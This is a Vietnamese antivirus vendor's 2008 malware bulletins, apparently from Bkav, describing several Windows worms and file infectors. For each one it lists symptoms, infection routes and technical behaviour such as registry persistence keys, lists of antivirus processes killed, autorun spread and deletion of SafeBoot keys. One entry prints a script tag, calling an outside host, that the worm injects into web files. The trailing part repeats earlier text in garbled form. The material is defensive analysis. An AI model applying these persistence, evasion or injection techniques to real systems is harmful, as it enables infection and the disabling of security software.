1  Sửa file hosts ngăn không cho người dùng truy cập vào một vài trang web bảo mật.  Sửa key không cho người dùng sử dụng một vài tiện ích của windows và làm mất menu FolderOptions.  Tắt các process và các cửa sổ có chứa 1 trong các xâu : peid , task view, telanjang, bugil, cewe, naked, porn, sex, alwil, wintask, folder option,worm, trojan, avira, windows script, commander, pc-media, killer, ertanto, anti, ahnlab, nod32, hijack, sysinter, aladdin, panda, trend, cillin, mcaf, avast, bitdef, machine, movzx, kill, washer, remove, wscript, diary, untukmu, kangen, sstray, Alicia, Mariana, Dian, foto, zlh, Anti, mspatch, siti, virus, services.com, ctfmon, nopdb, opscan, vptray, update, lexplorer, iexplorer, nipsvc, njeeves, cclaw, nvcoas, aswupdsv, ashmaisv, systray, riyani, xpshare, syslove, tskmgr, ccapps, ash, avg, poproxy, mcv  Tìm các địa chỉ mail trong máy, đồng thời gửi mail có đính kèm virus tới các địa chỉ vừa tìm được. Chuyên viên phân tích : Nguyễn Quốc Nhân 36. Bkav2009 (20/11/2008) cập nhật lần thứ 1: LogoOneKA, MegabyA Malware cập nhật mới nhất:  Tên malware: W32.LogoOneKA.PE  Thuộc họ: W32.LogoOne.PE  Loại: PE  Xuất xứ: Trung Quốc  Ngày phát hiện mẫu: 19/11/2008  Kích thước: 61Kb  Mức độ phá hoại: Cao Nguy cơ:  Ăn cắp thông tin cá nhân.  Lây file  Làm giảm mức độ bảo mật của hệ thống. Hiện tượng:  Sửa registry.  Dừng các chương trình diệt virus  Làm chậm hệ thống.  Mất icon của các file .exe Cách thức lây nhiễm:  Phát tán qua trang web, phần mềm miễn phí.  Phát tán qua các tài nguyên chia sẻ mạng nội bộ Cách phòng tránh:  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại 2  Không nên mở file đính kèm không rõ nguồn gốc, đặc biệt là các file có đuôi .exe .com .pif và .bat  Không nên share full các ổ đĩa, thư mục trong mạng nội bộ, nên đặt password truy cập nếu muốn chia sẻ quyền sửa và tạo file. Mô tả kỹ thuật:  Ghi giá trị "load" = %WinDir%\uninstall\rundl132.exe vào key HKLM\Software\Microsoft\Windows\CurrentVersion \Run để chạy virus mỗi khi windows được khởi động  Kiểm tra đã tồn tại key [HKLM\SOFTWARE\Soft\DownloadWWW] với giá trị "auto" = "1" làm dấu hiệu xác định xem virus lây nhiễm chưa.  Copy chính nó vào %Windir%\ Logo1_.exe %Windir%\uninstall\rundl132.exe  Drop ra file: %WinDir%\RichDll.dll  Ghi ngày lây nhiễm vào file C:\_desktop.ini  Lây file bằng cách ghi code virus vào trước file gốc.  Lây vào toàn bộ các file exe trong ổ cứng từ C đến Y.  Lây qua mạng nội bộ bằng cách copy và lây vào các file exe trong các thư mục shared  Không lây những file đường dẫn có chứa: • \Program Files\ • Common Files • ComPlus Applications • Documents and Settings • InstallShield Installation Information • Internet Explorer • Messenger • Microsoft Frontpage • Microsoft Office • Movie Maker • MSN • MSN Gaming Zone • NetMeeting • Outlook Express • Recycled • system • System Volume Information • system32 • windows • Windows Media Player • Windows NT • WindowsUpdate • winnt  Kill các services và chương trình diệt virus: • "Kingsoft AntiVirus Service" • EGHOST.EXE 3 • IPARMOR.EXE • KAVPFW.EXE • MAILMON.EXE • mcshield.exe • RavMon.exe • RavMonClass • Ravmond.EXE • regsvc.exe Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày: W32.ARPspoofT.Trojan, W32.FarfliKA.Rootkit, W32.FialaKA.Worm, W32.MegabyA.Worm, W32.VtLightIA.PE, W32.KxvoET.Worm, W32.WinbetTT.Trojan, W32.AlureonB.Trojan, W32.ArfuBot.Trojan, W32.CimusCD.Rootkit, W32.MSFoxCB.Worm 37. Bkav2011 (21/11/2008) cập nhật lần thứ 1: Suchop, MixaFQ Malware cập nhật mới nhất:  Tên malware: W32.MixaFQ.Worm  Thuộc họ: W32Mixa.Worm  Loại: Worm  Xuất xứ: Việt Nam  Ngày phát hiện mẫu: 20/11/2008  Kích thước: 3608Kb  Mức độ phá hoại: Trung bình Nguy cơ:  Làm giảm mức độ an ninh của hệ thống. Hiện tượng:  Sửa registry.  Bị logoff máy tính khi sử dụng 1 vài tiện ích của windows như: TaskMgr, RegistryTool,  Không hiển thị được file ẩn và file hệ thống. Cách thức lây nhiễm:  Phát tán qua trang web.  Tự động lây nhiễm vào USB. Cách phòng tránh:  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại  Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật:  Ghi giá trị "Userinit " = %SysDir%\systemio.exe vào key HKLM\ \CurrentVersion\Winlogon\ và Virus=%WinDir%\Mixa.exe Vào key HKLM\ \CurrentVersion\Run để virus được kích hoạt mỗi khi Windows khởi động 4  Copy bản thân thành các file : %SysDir%\systemio.exe %WinDir%\Mixa.exe  Liên tục check các process, nếu thấy process có chứa 1 trong các xâu : taskmgr, procexp, regedit, mmc thì đóng tất cả các ứng dụng và LogOff máy tính.  Copy bản thân thành file có tên "Mixa_I.exe" kèm theo file autorun.inf vào tất cả các ổ đĩa.  Liên tục ghi key làm người dùng không hiện được các file ẩn và file hệ thống. Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày: W32.ConthinA.Worm, W32.FialaKC.Worm, W32.HtmInfectB.Trojan, W32.Suchop.PE, W32.JvsoftLJ.Worm, W32.JvsoftLK.Worm, W32.OngameFS.Trojan, W32.RsnetJZ.Trojan, W32.Lin32.Trojan, W32.Sobicyt.Adware, W32.Soxpeca.Adware, 38. Bkav2013 - Phát hành lần thứ 1 ngày 22/11/2008, cập nhật DashferKA, VtLightKA, CkvoHGV, ResycleB, Cmhot Malware cập nhật mới nhất:  Tên malware: W32. DashferKA.PE  Thuộc họ: W32.Dashfer.PE  Loại: PE  Xuất xứ: Trung Quốc  Ngày phát hiện mẫu: 21/11/2008  Kích thước: 165Kb  Mức độ phá hoại: Cao Nguy cơ:  Làm giảm mức độ an ninh của hệ thống. Hiện tượng:  Sửa registry.  Không vào được chế độ safe mode của Windows.  Xuất hiện popup các trang web tiếng Trung Quốc.  Mất checkbox để hiển thị các file hệ thống. Cách thức lây nhiễm:  Phát tán qua trang web.  Tự động lây nhiễm qua USB.  Lây qua các file thực thi. Cách phòng tránh:  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại  Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật:  Xóa các key : HKLM\ \Control\SafeBoot\Minimal\{4D36E967- 5 E325-11CE-BFC1-08002BE10318} HKLM\ \Control\SafeBoot\Network\{4D36E967- E325-11CE-BFC1-08002BE10318} làm cho máy tính không khởi động được trong chế độ safemode. HKLM\Software\Microsoft\Windows\CurrentVersion \Run  Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup để virus được thực thi khi khởi đông hệ thống.  Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy.  Dump ra các file : %SysDir%\Com\smss.exe %SysDir%\Com\netcfg.dll %SysDir%\Com\netcfg.000 %SysDir%\Drivers\Alg.exe  Sửa key làm mất checkbox để hiển thị các file hệ thống.  Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.  Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard.  Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script : <script src="http://js.k01[removed].com/01.asp"></script>  Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ thống. Chuyên viên phân tích : Nguyễn Ngọc Dũng . Ghi giá trị "load" = %WinDir%uninstall undl132.exe vào key HKLMSoftwareMicrosoftWindowsCurrentVersion Run để chạy virus mỗi khi windows được khởi động  Kiểm tra đã tồn tại. "auto" = "1" làm dấu hiệu xác định xem virus lây nhiễm chưa.  Copy chính nó vào %Windir% Logo1_.exe %Windir%uninstall undl132.exe  Drop ra file: %WinDir%RichDll.dll  Ghi. • Windows NT • WindowsUpdate • winnt  Kill các services và chương trình diệt virus: • "Kingsoft AntiVirus Service" • EGHOST.EXE 3 • IPARMOR.EXE • KAVPFW.EXE • MAILMON.EXE